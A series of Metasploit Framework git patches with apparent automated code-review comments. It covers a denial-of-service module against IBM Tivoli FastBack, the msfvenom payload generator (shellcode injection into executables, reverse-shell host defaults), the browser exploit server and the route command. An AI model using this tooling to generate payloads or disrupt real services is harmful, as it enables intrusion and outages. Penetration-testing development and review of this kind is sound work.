diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 6d0fc435e0..f04adddfdf 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -12,11 +12,11 @@ class Metasploit4 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", + 'Name' => " Server Opcode 0x534 Denial of Service", 'Description' => %q{ - This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server - when dealing with packets triggering the opcode 0x534 handler - }, + This module exploits a denial of service condition present in IBM Tivoli Storage Manager + FastBack Server when dealing with packets triggering the opcode 0x534 handler. + }, 'License' => MSF_LICENSE, 'Author' => [ @@ -25,16 +25,16 @@ class Metasploit4 < Msf::Auxiliary ], 'References' => [ - ['URL', 'https://www.exploit-db.com/exploits/38979/'] + ['EDB', '38979'], + ['OSVDB', '132307'] ], 'DisclosureDate' => "Dec 15 2015", - 'DefaultOptions' => {} - )) + )) - register_options( - [ - Opt::RPORT(11460) - ], self.class) + register_options( + [ + Opt::RPORT(11460) + ], self.class) end def tv_pkt(opcode, p1="", p2="", p3="") @@ -60,12 +60,9 @@ class Metasploit4 < Msf::Auxiliary end def run - ip = datastore['RHOST'] - port = datastore['RPORT'] - target_opcode = 0x534 connect - print_status("Connected to: #{datastore['RHOST'].to_s} port: #{datastore['RPORT']}") + print_status("Connected to: #{rhost} port: #{rport}") print_status("Sending malicious packet") p = tv_pkt(target_opcode, From 541e3972f0e4c9dfb62f74b5161d01cba7222816 Mon Sep 17 00:00:00 2001 
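Review bot: The new `'Name'` value in the first hunk reads `" Server Opcode 0x534 Denial of Service"`: the product name is gone and a leading space is left behind, while the description directly below still refers to IBM Tivoli Storage Manager FastBack Server. The name is presumably what users and reports identify the module by, so without the product it no longer says what is affected. Restore it: `'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service",`. The commit subject only mentions metadata and minor changes, so this looks unintended.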
From: James Lee <egypt@metasploit.com> Date: Fri, 12 Feb 2016 10:49:18 -0600 Subject: [PATCH 59/71] No real reason for this check And it breaks stuff when msfvenom is run as a symlink --- msfvenom | 616 +++++++++++++++++++++++++++---------------------------- 1 file changed, 306 insertions(+), 310 deletions(-) diff --git a/msfvenom b/msfvenom index 36a8f7be05..6c25288081 100755 --- a/msfvenom +++ b/msfvenom 
@@ -1,365 +1,361 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -if __FILE__ == $0 +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end - msfbase = __FILE__ - while File.symlink?(msfbase) - msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) +require 'msfenv' + +$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] + +require 'rex' +require 'msf/ui' +require 'msf/base' +require 'msf/core/payload_generator' + + +class MsfVenomError < StandardError; end +class UsageError < MsfVenomError; end +class NoTemplateError < MsfVenomError; end +class IncompatibleError < MsfVenomError; end + + +require 'optparse' + + +# Creates a new framework object. +# +# @note Ignores any previously cached value. +# @param (see ::Msf::Simple::Framework.create) +# @return [Msf::Framework] +def init_framework(create_opts={}) + create_opts[:module_types] ||= [ + ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP + ] + @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true)) +end + +# Cached framework object +# +# @return [Msf::Framework] +def framework + return @framework if @framework + + init_framework + + @framework +end + + +def parse_args(args) + opts = {} + datastore = {} + opt = OptionParser.new + banner = "MsfVenom - a Metasploit standalone payload generator.\n" + banner << "Also a replacement for msfpayload and msfencode.\n" + banner << "Usage: #{$0} [options] <var=val>" + opt.banner = banner + opt.separator('') + opt.separator('Options:') + + opt.on('-p', '--payload <payload>', String, + 'Payload to use. 
Specify a \'-\' or stdin to use custom payloads') do |p| + if p == '-' + opts[:payload] = 'stdin' + else + opts[:payload] = p + end end - $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) - require 'msfenv' - - $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] - - require 'rex' - require 'msf/ui' - require 'msf/base' - require 'msf/core/payload_generator' - - - class MsfVenomError < StandardError; end - class UsageError < MsfVenomError; end - class NoTemplateError < MsfVenomError; end - class IncompatibleError < MsfVenomError; end - - - require 'optparse' - - - # Creates a new framework object. - # - # @note Ignores any previously cached value. - # @param (see ::Msf::Simple::Framework.create) - # @return [Msf::Framework] - def init_framework(create_opts={}) - create_opts[:module_types] ||= [ - ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP - ] - @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true)) + opt.on('--payload-options', "List the payload's standard options") do + opts[:list_options] = true end - # Cached framework object - # - # @return [Msf::Framework] - def framework - return @framework if @framework - - init_framework - - @framework + opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| + if l.nil? or l.empty? 
+ l = ["all"] + end + opts[:list] = l end + opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| + opts[:nops] = n.to_i + end - def parse_args(args) - opts = {} - datastore = {} - opt = OptionParser.new - banner = "MsfVenom - a Metasploit standalone payload generator.\n" - banner << "Also a replacement for msfpayload and msfencode.\n" - banner << "Usage: #{$0} [options] <var=val>" - opt.banner = banner - opt.separator('') - opt.separator('Options:') + opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f| + opts[:format] = f + end - opt.on('-p', '--payload <payload>', String, - 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| - if p == '-' - opts[:payload] = 'stdin' - else - opts[:payload] = p - end + opt.on('--help-formats', String, "List available formats") do + init_framework(:module_types => []) + msg = "Executable formats\n" + + "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + + "Transform formats\n" + + "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") + raise UsageError, msg + end + + opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e| + opts[:encoder] = e + end + + opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a| + opts[:arch] = a + end + + opt.on('--platform <platform>', String, 'The platform of the payload') do |l| + opts[:platform] = l + end + + opt.on('--help-platforms', String, 'List available platforms') do + init_framework(:module_types => []) + supported_platforms = [] + Msf::Module::Platform.subclasses.each {|c| supported_platforms << "#{c.realname.downcase}"} + msg = "Platforms\n" + + "\t" + supported_platforms * ", " + raise UsageError, msg + end + + opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s| + opts[:space] = s + end + + opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload 
(defaults to the -s value)') do |s| + opts[:encoder_space] = s + end + + opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| + opts[:badchars] = Rex::Text.hex_to_raw(b) + end + + opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i| + opts[:iterations] = i + end + + opt.on('-c', '--add-code <path>', String, 'Specify an additional win32 shellcode file to include') do |x| + opts[:add_code] = x + end + + opt.on('-x', '--template <path>', String, 'Specify a custom executable file to use as a template') do |x| + opts[:template] = x + end + + opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do + opts[:keep] = true + end + + opt.on('-o', '--out <path>', 'Save the payload') do |x| + opts[:out] = x + end + + opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x| + opts[:var_name] = x + end + + opt.on('--smallest', 'Generate the smallest possible payload') do + opts[:smallest] = true + end + + opt.on_tail('-h', '--help', 'Show this message') do + raise UsageError, "#{opt}" + end + + begin + opt.parse!(args) + rescue OptionParser::InvalidOption => e + raise UsageError, "Invalid option\n#{opt}" + rescue OptionParser::MissingArgument => e + raise UsageError, "Missing required argument for option\n#{opt}" + end + + if opts.empty? + raise UsageError, "No options\n#{opt}" + end + + if args + args.each do |x| + k,v = x.split('=', 2) + datastore[k.upcase] = v.to_s end - - opt.on('--payload-options', "List the payload's standard options") do - opts[:list_options] = true + if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil? + datastore['LHOST'] = Rex::Socket.source_address end + end - opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| - if l.nil? or l.empty? 
- l = ["all"] - end - opts[:list] = l - end - - opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| - opts[:nops] = n.to_i - end - - opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f| - opts[:format] = f - end - - opt.on('--help-formats', String, "List available formats") do - init_framework(:module_types => []) - msg = "Executable formats\n" + - "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + - "Transform formats\n" + - "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") - raise UsageError, msg - end - - opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e| - opts[:encoder] = e - end - - opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a| - opts[:arch] = a - end - - opt.on('--platform <platform>', String, 'The platform of the payload') do |l| - opts[:platform] = l - end - - opt.on('--help-platforms', String, 'List available platforms') do - init_framework(:module_types => []) - supported_platforms = [] - Msf::Module::Platform.subclasses.each {|c| supported_platforms << "#{c.realname.downcase}"} - msg = "Platforms\n" + - "\t" + supported_platforms * ", " - raise UsageError, msg - end - - opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s| - opts[:space] = s - end - - opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| - opts[:encoder_space] = s - end - - opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| - opts[:badchars] = Rex::Text.hex_to_raw(b) - end - - opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i| - opts[:iterations] = i - end - - opt.on('-c', '--add-code <path>', String, 'Specify an additional win32 shellcode file to include') do |x| - opts[:add_code] = x - end - - opt.on('-x', 
'--template <path>', String, 'Specify a custom executable file to use as a template') do |x| - opts[:template] = x - end - - opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do - opts[:keep] = true - end - - opt.on('-o', '--out <path>', 'Save the payload') do |x| - opts[:out] = x - end - - opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x| - opts[:var_name] = x - end - - opt.on('--smallest', 'Generate the smallest possible payload') do - opts[:smallest] = true - end - - opt.on_tail('-h', '--help', 'Show this message') do - raise UsageError, "#{opt}" - end + if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin + opts[:payload] = "stdin" + end + if opts[:payload] == 'stdin' and not opts[:list] + $stderr.puts "Attempting to read payload from STDIN..." begin - opt.parse!(args) - rescue OptionParser::InvalidOption => e - raise UsageError, "Invalid option\n#{opt}" - rescue OptionParser::MissingArgument => e - raise UsageError, "Missing required argument for option\n#{opt}" - end - - if opts.empty? - raise UsageError, "No options\n#{opt}" - end - - if args - args.each do |x| - k,v = x.split('=', 2) - datastore[k.upcase] = v.to_s - end - if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil? - datastore['LHOST'] = Rex::Socket.source_address + ::Timeout.timeout(30) do + opts[:stdin] = payload_stdin end + rescue Timeout::Error + opts[:stdin] = '' end - - if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin - opts[:payload] = "stdin" - end - - if opts[:payload] == 'stdin' and not opts[:list] - $stderr.puts "Attempting to read payload from STDIN..." 
- begin - ::Timeout.timeout(30) do - opts[:stdin] = payload_stdin - end - rescue Timeout::Error - opts[:stdin] = '' - end - end - - opts[:datastore] = datastore - - opts end + opts[:datastore] = datastore - # Read a raw payload from stdin (or whatever IO object we're currently - # using as stdin, see {#initialize}) - # - # @return [String] - def payload_stdin - @in = $stdin - @in.binmode - payload = @in.read - payload - end + opts +end - def dump_payloads - init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", - 'Columns' => - [ - "Name", - "Description" - ]) - framework.payloads.each_module { |name, mod| - tbl << [ name, mod.new.description.split.join(' ') ] - } +# Read a raw payload from stdin (or whatever IO object we're currently +# using as stdin, see {#initialize}) +# +# @return [String] +def payload_stdin + @in = $stdin + @in.binmode + payload = @in.read + payload +end - "\n" + tbl.to_s + "\n" - end +def dump_payloads + init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", + 'Columns' => + [ + "Name", + "Description" + ]) - def dump_encoders(arch = nil) - init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), - 'Columns' => - [ - "Name", - "Rank", - "Description" - ]) - cnt = 0 + framework.payloads.each_module { |name, mod| + tbl << [ name, mod.new.description.split.join(' ') ] + } - framework.encoders.each_module( - 'Arch' => arch ? 
arch.split(',') : nil) { |name, mod| + "\n" + tbl.to_s + "\n" +end + +def dump_encoders(arch = nil) + init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), + 'Columns' => + [ + "Name", + "Rank", + "Description" + ]) + cnt = 0 + + framework.encoders.each_module( + 'Arch' => arch ? arch.split(',') : nil) { |name, mod| tbl << [ name, mod.rank_to_s, mod.new.name ] cnt += 1 } (cnt > 0) ? "\n" + tbl.to_s + "\n" : "\nNo compatible encoders found.\n\n" - end +end - def dump_nops - init_framework(:module_types => [ ::Msf::MODULE_NOP ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", - 'Columns' => - [ - "Name", - "Description" - ]) +def dump_nops + init_framework(:module_types => [ ::Msf::MODULE_NOP ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", + 'Columns' => + [ + "Name", + "Description" + ]) - framework.nops.each_module { |name, mod| - tbl << [ name, mod.new.description.split.join(' ') ] - } + framework.nops.each_module { |name, mod| + tbl << [ name, mod.new.description.split.join(' ') ] + } - "\n" + tbl.to_s + "\n" - end + "\n" + tbl.to_s + "\n" +end - begin - generator_opts = parse_args(ARGV) - rescue MsfVenomError, Msf::OptionValidateError => e - $stderr.puts "Error: #{e.message}" - exit(1) - end +begin + generator_opts = parse_args(ARGV) +rescue MsfVenomError, Msf::OptionValidateError => e + $stderr.puts "Error: #{e.message}" + exit(1) +end - if generator_opts[:list] - generator_opts[:list].each do |mod| - case mod.downcase - when "payloads", "payload", "p" - $stdout.puts dump_payloads - when "encoders", "encoder", "e" - $stdout.puts dump_encoders(generator_opts[:arch]) - when "nops", "nop", "n" - $stdout.puts dump_nops - when "all" - # Init here so #dump_payloads doesn't create a 
framework with - # only payloads, etc. - init_framework - $stdout.puts dump_payloads - $stdout.puts dump_encoders - $stdout.puts dump_nops - else - $stderr.puts "Invalid module type. These are valid: payloads, encoders, nops, all" - end +if generator_opts[:list] + generator_opts[:list].each do |mod| + case mod.downcase + when "payloads", "payload", "p" + $stdout.puts dump_payloads + when "encoders", "encoder", "e" + $stdout.puts dump_encoders(generator_opts[:arch]) + when "nops", "nop", "n" + $stdout.puts dump_nops + when "all" + # Init here so #dump_payloads doesn't create a framework with + # only payloads, etc. + init_framework + $stdout.puts dump_payloads + $stdout.puts dump_encoders + $stdout.puts dump_nops + else + $stderr.puts "Invalid module type. These are valid: payloads, encoders, nops, all" end - exit(0) + end + exit(0) +end + +if generator_opts[:list_options] + payload_mod = framework.payloads.create(generator_opts[:payload]) + + if payload_mod.nil? + $stderr.puts "Invalid payload: #{generator_opts[:payload]}" + exit end - if generator_opts[:list_options] - payload_mod = framework.payloads.create(generator_opts[:payload]) + $stderr.puts "Options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_module(payload_mod, ' ') - if payload_mod.nil? 
- $stderr.puts "Invalid payload: #{generator_opts[:payload]}" - exit - end + $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') - $stderr.puts "Options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_module(payload_mod, ' ') + $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, ' ') + exit(0) +end - $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') +generator_opts[:framework] = framework +generator_opts[:cli] = true - $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, ' ') - exit(0) - end +begin + venom_generator = Msf::PayloadGenerator.new(generator_opts) + payload = venom_generator.generate_payload +rescue ::Exception => e + elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") + $stderr.puts "Error: #{e.message}" +end - generator_opts[:framework] = framework - generator_opts[:cli] = true +# No payload generated, no point to go on +exit(2) unless payload +if generator_opts[:out] begin - venom_generator = Msf::PayloadGenerator.new(generator_opts) - payload = venom_generator.generate_payload + ::File.open(generator_opts[:out], 'wb') do |f| + f.write(payload) + end + $stderr.puts "Saved as: #{generator_opts[:out]}" rescue ::Exception => e + # If I can't save it, then I can't save it. I don't think it matters what error. 
elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") $stderr.puts "Error: #{e.message}" end - - # No payload generated, no point to go on - exit(2) unless payload - - if generator_opts[:out] - begin - ::File.open(generator_opts[:out], 'wb') do |f| - f.write(payload) - end - $stderr.puts "Saved as: #{generator_opts[:out]}" - rescue ::Exception => e - # If I can't save it, then I can't save it. I don't think it matters what error. - elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}") - $stderr.puts "Error: #{e.message}" - end - else - output_stream = $stdout - output_stream.binmode - output_stream.write payload - # trailing newline for pretty output - $stderr.puts unless payload =~ /\n$/ - end - +else + output_stream = $stdout + output_stream.binmode + output_stream.write payload + # trailing newline for pretty output + $stderr.puts unless payload =~ /\n$/ end From 93cc7d58baf76bceaf19f16721ca847292d65373 Mon Sep 17 00:00:00 2001 From: Metasploit <metasploit@rapid7.com> Date: Fri, 12 Feb 2016 15:38:50 -0800 Subject: [PATCH 60/71] Bump version of framework to 4.11.11 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 32690ca571..4cf7c7588b 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.10) + metasploit-framework (4.11.11) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 68443720c0..a5241a7344 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.10" + VERSION = "4.11.11" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 1f58ad15ace7ebff4d03a786cfc2f8c1c8a7085e Mon Sep 17 00:00:00 2001 
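Review bot: In the `generator_opts[:list_options]` branch of msfvenom, the invalid-payload path prints "Invalid payload: …" and then calls bare `exit`, which ends the process with status 0, so a calling script cannot tell the failure from success; use `exit(1)` there, as the argument-parsing error path already does. Both `rescue ::Exception => e` clauses (around `generate_payload` and around the output-file write) also catch `Interrupt` and `SystemExit`; `rescue ::StandardError => e` would keep the logging without swallowing those. The file-write failure path likewise prints an error and then falls off the end with status 0. With the `if __FILE__ == $0` guard removed, all of this now runs whenever the file is loaded rather than executed, so any code that loads msfvenom for its helper methods (none is visible here) would reach these `exit` calls.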
From: Brent Cook <bcook@rapid7.com> Date: Mon, 15 Feb 2016 16:21:24 -0600 Subject: [PATCH 61/71] Browser::Exploit::Server needs to have vprint* --- lib/msf/core/exploit/remote/browser_exploit_server.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index 1ad7cffa70..1f6da0ecf5 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -7,6 +7,7 @@ require 'set' require 'rex/exploitation/js' require 'msf/core/exploit/jsobfu' require 'msf/core/exploit/remote/browser_profile_manager' +require 'msf/core/module' ### # @@ -28,6 +29,8 @@ module Msf include Msf::Exploit::RopDb include Msf::Exploit::JSObfu include Msf::Exploit::Remote::BrowserProfileManager + include Msf::Module::UI::Line::Verbose + include Msf::Module::UI::Message::Verbose # this must be static between runs, otherwise the older cookies will be ignored DEFAULT_COOKIE_NAME = '__ua' @@ -136,7 +139,6 @@ module Msf clear_browser_profiles unless self.datastore['BrowserProfilePrefix'] end - # Returns the custom 404 URL set by the user # # @return [String] From 1263a82d1e77ece79ef791fd8b2dc20f8861a8d4 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Tue, 16 Feb 2016 09:12:34 -0600 Subject: [PATCH 62/71] update database.yml.example to be something reasonable --- config/database.yml.example | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/config/database.yml.example b/config/database.yml.example index 060dd23625..b04aede6b0 100644 --- a/config/database.yml.example +++ b/config/database.yml.example 
@@ -1,9 +1,9 @@ -# Please only use postgresql bound to a TCP port. -# Only postgresql is supportable for metasploit-framework -# these days. (No SQLite, no MySQL). -# # To set up a metasploit database, follow the directions hosted at: # http://r-7.co/MSF-DEV#set-up-postgresql +# +# Kali Linux and the Omnibus installers both include an easy wrapper script for +# managing your database, which may be more convenient than rolling your own. + development: &pgsql adapter: postgresql database: metasploit_framework_development @@ -11,7 +11,7 @@ development: &pgsql password: __________________________________ host: localhost port: 5432 - pool: 5 + pool: 200 timeout: 5 # You will often want to seperate your databases between dev From 35e0a433eaca11ab416158ed7d14d1b8d2960a9e Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 16 Feb 2016 14:45:00 -0600 Subject: [PATCH 63/71] Make error output more useful --- lib/msf/ui/console/command_dispatcher/core.rb | 60 +++++++++---------- 1 file changed, 27 insertions(+), 33 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index a05d06080f..a6165c2bbb 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1306,12 +1306,12 @@ class Core return false end - arg = args.shift - case arg + action = args.shift + case action when "add", "remove", "del" if (args.length < 3) - print_error("Missing arguments to route #{arg}.") + print_error("Missing arguments to route #{action}.") return false end 
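Review bot: The second hunk of config/database.yml.example raises `pool: 5` to `pool: 200` with no explanation, and anyone copying the example gets a pool ceiling above PostgreSQL's stock `max_connections` of 100, so under load the client could request more connections than the server will grant. Add a comment beside the value, e.g. `# upper bound on concurrent connections; keep at or below the server's max_connections`, or choose a value under that default. The first hunk also removes the statement that only PostgreSQL is supported; the linked setup guide may cover it, but one line saying so here would spare the reader the lookup.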
@@ -1326,44 +1326,38 @@ class Core return false end - gw = nil + gateway_name = args.pop - # Satisfy case problems - args[2] = "Local" if (args[2] =~ /local/i) + gateway = nil - begin - # If the supplied gateway is a global Comm, use it. - if (Rex::Socket::Comm.const_defined?(args[2])) - gw = Rex::Socket::Comm.const_get(args[2]) + case gateway_name + when /local/i + gateway = Rex::Socket::Comm::Local + when /^[0-9]+$/ + session = framework.sessions.get(gateway_name) + if session.kind_of?(Msf::Session::Comm) + gateway = session + elsif session.nil? + print_error("Not a session: #{gateway_name}") + return false + else + print_error("Cannout route through specified session (not a Comm)") + return false end - rescue NameError - end - - # If we still don't have a gateway, check if it's a session. - if ((gw == nil) and - (session = framework.sessions.get(args[2])) and - (session.kind_of?(Msf::Session::Comm))) - gw = session - elsif (gw == nil) - print_error("Invalid gateway specified.") + else + print_error("Invalid gateway") return false end - if arg == "remove" or arg == "del" - worked = Rex::Socket::SwitchBoard.remove_route(args[0], args[1], gw) - if worked - print_status("Route removed") - else - print_error("Route not found") - end + msg = "Route " + if action == "remove" or action == "del" + worked = Rex::Socket::SwitchBoard.remove_route(args[0], args[1], gateway) + msg << worked ? "removed" : "not found" else - worked = Rex::Socket::SwitchBoard.add_route(args[0], args[1], gw) - if worked - print_status("Route added") - else - print_error("Route already exists") - end + worked = Rex::Socket::SwitchBoard.add_route(args[0], args[1], gateway) + msg << worked ? "added" : "already exists" end + print_status(msg) when "get" if (args.length == 0) From 28e6d8ef9e99b6879d1d19c4b75ac36cbc4f7166 Mon Sep 17 00:00:00 2001 
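Review bot: `msg << worked ? "removed" : "not found"` and the matching `"added" : "already exists"` line in the second hunk parse as `(msg << worked) ? … : …`, because `<<` binds tighter than the ternary. `worked` itself is appended to the string (a TypeError if it is a boolean or nil) and the intended text never reaches `msg`. Parenthesise the ternary: `msg << (worked ? "removed" : "not found")`. Two smaller points in the same hunk: the error string reads "Cannout route", and `/local/i` and `/^[0-9]+$/` are looser than they look, so `/\Alocal\z/i` and `/\A[0-9]+\z/` would match the whole argument only. Failures are now also reported through `print_status` where the old code used `print_error`; the enclosing command method starts and ends outside the hunk.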
From: James Lee <egypt@metasploit.com> Date: Wed, 17 Feb 2016 09:44:32 -0600 Subject: [PATCH 64/71] Allow CIDR notation for the route command --- lib/msf/ui/console/command_dispatcher/core.rb | 34 +++++++++---------- 1 file changed, 16 insertions(+), 18 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index a6165c2bbb..cf11b92dd7 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1310,24 +1310,22 @@ class Core case action when "add", "remove", "del" - if (args.length < 3) + subnet = args.shift + subnet,cidr_mask = subnet.split("/") + + if cidr_mask + netmask = Rex::Socket.addr_ctoa(cidr_mask.to_i) + else + netmask = args.shift + end + + gateway_name = args.shift + + if (subnet.nil? || netmask.nil? || gateway_name.nil?) print_error("Missing arguments to route #{action}.") return false end - # Satisfy check to see that formatting is correct - unless Rex::Socket::RangeWalker.new(args[0]).length == 1 - print_error "Invalid IP Address" - return false - end - - unless Rex::Socket::RangeWalker.new(args[1]).length == 1 - print_error "Invalid Subnet mask" - return false - end - - gateway_name = args.pop - gateway = nil case gateway_name @@ -1351,11 +1349,11 @@ class Core msg = "Route " if action == "remove" or action == "del" - worked = Rex::Socket::SwitchBoard.remove_route(args[0], args[1], gateway) - msg << worked ? "removed" : "not found" + worked = Rex::Socket::SwitchBoard.remove_route(subnet, netmask, gateway) + msg << (worked ? "removed" : "not found") else - worked = Rex::Socket::SwitchBoard.add_route(args[0], args[1], gateway) - msg << worked ? "added" : "already exists" + worked = Rex::Socket::SwitchBoard.add_route(subnet, netmask, gateway) + msg << (worked ? "added" : "already exists") end print_status(msg) From adb175136e99a61f2011d2a411f6900620e9ed86 Mon Sep 17 00:00:00 2001 
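Review bot: In the first hunk `subnet = args.shift` is followed directly by `subnet.split("/")`, so `route add` with nothing after it calls `split` on nil and raises NoMethodError before the "Missing arguments" check is reached. Split defensively with `subnet, cidr_mask = args.shift.to_s.split("/", 2)`, which leaves `subnet` nil for empty input so the existing nil check reports it. The hunk also removes both `RangeWalker` format checks, and `cidr_mask.to_i` turns any non-numeric suffix into 0, so malformed subnets, masks, or prefix lengths outside 0..32 (for IPv4) now go straight to `SwitchBoard`. Keep a validation step, for example reject the input unless `cidr_mask =~ /\A\d+\z/` and `(0..32).cover?(cidr_mask.to_i)`. The enclosing command method starts and ends outside the hunk.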
